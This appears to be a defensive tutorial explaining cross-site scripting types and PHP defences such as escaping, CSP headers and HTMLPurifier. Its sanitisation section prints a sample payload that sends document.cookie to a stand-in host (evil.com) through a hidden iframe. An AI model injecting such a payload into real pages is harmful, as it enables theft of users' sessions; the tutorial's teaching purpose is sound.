XSS: Cross-Site Scripting


This is probably the most common vulnerability in web applications today. It consists of injecting client-side scripts into web pages viewed by other users.

What is Cross-Site Scripting?

XSS occurs when an attacker is able to inject a script, often JavaScript, into the output of a web application in such a way that it is executed in the client's browser.

Although developers often underestimate it, injected JavaScript can do a lot of damage: stealing cookies and sessions, impersonating the user to perform requests, redirecting to hostile hosts, manipulating client-side persistent storage, rewriting or manipulating in-browser applications, attacking browser extensions, and the list goes on.

Types of Cross-Site Scripting Attacks

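These attacks are usually categorised by how the malicious input travels through the web application: it is either included in the output of the current request (reflected) or stored and included in the output of a later request (stored). A third variant, DOM-based XSS, is distinguished by where the payload takes effect rather than by how it arrives.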

  • Reflected XSS Attack: Untrusted input sent to a web application is immediately included in the application’s output. Reflection can occur with error messages, search engine submissions, comment previews, etc. This form of attack can be mounted by persuading a user to click a link or submit a form of the attacker’s choosing.
  • Stored XSS Attack: A Stored XSS attack is when the payload for the attack is stored somewhere and retrieved as users view the targeted data. While a database is to be expected, other persistent storage mechanisms can include caches and logs which also store information for long periods of time.
  • DOM-based XSS Attack: DOM-based XSS can be either reflected or stored; the difference lies in what the attack targets. Most attacks strike at the immediate markup of an HTML document. However, HTML may also be manipulated by JavaScript using the DOM. An injected payload that is rendered safely in HTML might still be capable of interfering with DOM operations in JavaScript. There may also be security vulnerabilities in JavaScript libraries, or in the way they are used, which can be targeted as well.
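To make the reflected case concrete, here is a minimal sketch of a search page that echoes its query back to the user. The function names and the payload are hypothetical and exist only for illustration; the escaped variant uses PHP's built-in htmlspecialchars().

```php
<?php
// Hypothetical search page helpers; the names are illustrative only.

// UNSAFE: the query is copied into the HTML output unchanged.
function render_results_unsafe(string $query): string
{
    return '<p>Results for: ' . $query . '</p>';
}

// SAFER: HTML special characters are escaped before output.
function render_results_escaped(string $query): string
{
    return '<p>Results for: '
        . htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</p>';
}

// An attacker would place a value like this in a link or a form field.
$payload = '<script>alert(1)</script>';

echo render_results_unsafe($payload), "\n";  // the script tag reaches the browser intact
echo render_results_escaped($payload), "\n"; // the payload is shown as plain text
```

In the first call the browser would run the injected script; in the second it only sees text, because the angle brackets have been turned into HTML entities.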

How to prevent XSS

Here is a list of topics you should keep in mind.

Input Validation

Input Validation is any web application's first line of defence. Validation works best at preventing XSS attacks on data which has inherent value limits. An integer, for example, should never contain HTML special characters. An option, such as a country name, should match a list of allowed countries, which likewise prevents XSS payloads from being injected.

Input Validation can also check data with clear syntax constraints.
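The three kinds of check described above could look roughly like the sketch below. The helper names and the country list are assumptions made up for this example; filter_var(), in_array(), preg_match() and checkdate() are standard PHP functions. Each helper returns null when the input is rejected.

```php
<?php
// Hypothetical allow-list; a real application would load its own.
const ALLOWED_COUNTRIES = ['Argentina', 'Ireland', 'Japan'];

// Value limit: returns the integer, or null if the input is not an integer.
function validate_int(string $input): ?int
{
    $value = filter_var($input, FILTER_VALIDATE_INT);
    return $value === false ? null : $value;
}

// Allow-list: accepts only exact matches (strict comparison).
function validate_country(string $input): ?string
{
    return in_array($input, ALLOWED_COUNTRIES, true) ? $input : null;
}

// Syntax constraint: YYYY-MM-DD that is also a real calendar date.
function validate_date(string $input): ?string
{
    if (!preg_match('/\A(\d{4})-(\d{2})-(\d{2})\z/', $input, $m)) {
        return null;
    }
    return checkdate((int) $m[2], (int) $m[3], (int) $m[1]) ? $input : null;
}

var_dump(validate_int('42'));                              // accepted
var_dump(validate_int('42<script>'));                      // rejected
var_dump(validate_country('<script>alert(1)</script>'));   // rejected
var_dump(validate_date('2024-02-29'));                     // accepted
```

Validation of this kind narrows what can reach the application, but it does not replace escaping on output: free-text fields such as names or comments cannot be validated this strictly.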

Escaping (also Encoding)

Escaping data on output is a method of ensuring that the data cannot be misinterpreted by the currently running parser or interpreter. The method of escaping varies depending on which context the data is being injected into. The most common contexts are: HTML body, HTML attribute, JavaScript, URL and CSS.
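As a rough illustration of how the escaping differs per context, the sketch below wraps three standard PHP functions. The wrapper names are hypothetical, JSON_THROW_ON_ERROR assumes PHP 7.3 or later, and the CSS context is left out because PHP core has no built-in CSS escaper.

```php
<?php
// HTML body and quoted HTML attribute values.
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// A single URL component, such as a query-string value.
function escape_url_component(string $value): string
{
    return rawurlencode($value);
}

// A value embedded in an inline script as a JavaScript literal.
// The JSON_HEX_* flags keep <, >, &, ' and " out of the encoded output.
function escape_js_value($value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

$name = '"><script>alert(1)</script>';

echo '<p>Hello, ' . escape_html($name) . '</p>', "\n";
echo '<input value="' . escape_html($name) . '">', "\n";
echo '<a href="/search?q=' . escape_url_component($name) . '">Search</a>', "\n";
echo '<script>var name = ' . escape_js_value($name) . ';</script>', "\n";
```

The same input is encoded differently on each line, which is the point: an escaper that is correct for the HTML body is not automatically safe inside a URL or a script block.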

Content Security Policy

The Content Security Policy (CSP) is an HTTP header that communicates a whitelist of resource sources the browser can trust. Any source not included in the whitelist is ignored by the browser since it is untrusted. Consider the following:

Content-Security-Policy: script-src 'self'

This CSP header tells the browser to trust only JavaScript source URLs pointing to the current domain and to ignore the rest. Older browsers used the prefixed X-Content-Security-Policy and X-WebKit-CSP names; current browsers expect the unprefixed Content-Security-Policy header.

If we need to use JavaScript from another source besides 'self', we can extend the whitelist to include it. For example, let's include jQuery's CDN address.

Content-Security-Policy: script-src 'self' http://code.jquery.com; style-src 'self'
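In a PHP application the policy is typically sent with header(). The sketch below assembles the same policy from an array and uses the standardised Content-Security-Policy header name; build_csp() is a hypothetical helper written for this example, not part of PHP.

```php
<?php
// Hypothetical helper: builds the header value from a map of
// directive name => list of allowed sources.
function build_csp(array $directives): string
{
    $parts = [];
    foreach ($directives as $directive => $sources) {
        $parts[] = $directive . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

$policy = build_csp([
    'script-src' => ["'self'", 'http://code.jquery.com'],
    'style-src'  => ["'self'"],
]);

// Headers must be sent before any of the response body is written.
if (!headers_sent()) {
    header('Content-Security-Policy: ' . $policy);
}
```

Keeping the sources in one array makes the whitelist easy to review, and note that the quotes around 'self' are part of the CSP syntax and must be plain ASCII apostrophes.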

Browser Detection

HTML Sanitisation

At some point we might need to include external HTML without escaping it. Blog comments are one example.

If we were to escape the HTML markup coming from those sources, it would never render correctly, so instead we need to filter it carefully to make sure that any and all dangerous markup is neutralised.

For example:

I am a Markdown paragraph.<script>document.write('<iframe src="http://evil.com?cookie=' + encodeURIComponent(document.cookie) + '" height=0 width=0 />');</script>

There’s no need to panic. I swear I am just plain text!

Markdown is a popular alternative to writing HTML but it also allows authors to mix HTML into Markdown. It’s a perfectly valid Markdown feature and a Markdown renderer won’t care whether there is an XSS payload included.

To prevent this, here is an example using a PHP library, HTMLPurifier:

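// Assumes HTMLPurifier was installed with Composer; adjust the path to your setup
require_once 'vendor/autoload.php';

// Basic setup without a cache
$config = HTMLPurifier_Config::createDefault();
$config->set('Cache.DefinitionImpl', null); // disable the definition cache
$config->set('Core.Encoding', 'UTF-8');
$config->set('HTML.Doctype', 'HTML 4.01 Transitional');
// Create the whitelist
$config->set('HTML.Allowed', 'p,b,a[href],i'); // basic formatting and links
$sanitiser = new HTMLPurifier($config);
// Anything not on the whitelist (such as <script>) is removed from the output
$output = $sanitiser->purify($untrustedHtml);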

Final remarks and cheat sheets

The first step in preventing almost any kind of attack is always to clean and sanitise all inputs and outputs.

Security should run through the whole lifecycle of the project; it is not a patch we can apply at some point to fix all problems. It should be considered from the design stage.

In addition to the above, and to finish this post, I will share a couple of cheat sheets that should help you during the development and implementation stages.